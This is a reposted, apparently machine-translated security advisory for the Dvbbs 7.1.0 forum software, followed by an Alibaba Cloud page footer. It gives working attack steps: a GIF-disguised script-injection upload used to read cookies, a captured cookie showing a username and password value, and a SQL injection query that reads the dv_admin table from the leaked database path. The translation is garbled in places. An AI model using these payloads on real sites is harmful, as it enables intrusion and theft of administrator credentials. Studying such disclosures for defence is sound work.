Dvbbs 7.1.0 cookie leakage absolute Path Vulnerability

Source: Internet
Author: User

Author: LiNZI [B .C. T] @ www.cnbct.org
Information Source: evil baboons Information Security Team

Vendor name: yunnet pioneer Discussion
Vendor address: http://www.dvbbs.net/
Vulnerability program: Dvbbs 7.1.0
Vulnerability description:
The Cookie of Dvbbs 7.1.0 has the absolute path vulnerability that exposes the site. Attackers can use other technologies to perform cross-Database SQL queries.
Vulnerability Exploitation example:
1. absolute vulnerability leakage test:
Official test site: bbs.dvbbs.net
Upload a graph with the following code:
GIF89a
<Script> alert (events. cookie) </script>
The cookie obtained by packet capture is as follows:
Cookie: ASPSESSIONIDSSDSCBQD = NHANOBNCAPCPAMCFMAGDIJCB; dwebdvbbs7 % 2E1% 2E0 = UserID = 617054 & usercookies = 1 & userclass = % D0 % C2 % CA % D6 % C9 % CF % C2 % B7 & username = linzibct & password = t8ob621664s5v6HL & userhidden = 2 & StatUserID = 2189992004; dvbbs =
Analyze the cookie to obtain the absolute path of the site as follows:
D: \ web \ dvbbs7 is the absolute path of the discussion.
Ii. Attack extension:
Www.host.com
The main program has the SQL injection vulnerability, but the table name and field name cannot be found.
Injection Point hypothesis:
Www.host.com \ linzi. asp? Fuck = you
The discussion is about dvbbs 7.1.0, the database is data \ dvbbs. asp, and anti-download processing is implemented.
Use the above Network violence path to capture packets and get the absolute path d: \ www \ dvbbs \ data \ dvbbs. asp
Cross-database query is implemented as follows:
Www.host.com \ linzi. asp? Fuck = you and (select count (*) from dv_admin in "d: \ www \ dvbbs \ data \ dvbbs. asp ")
Official patch:
No

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.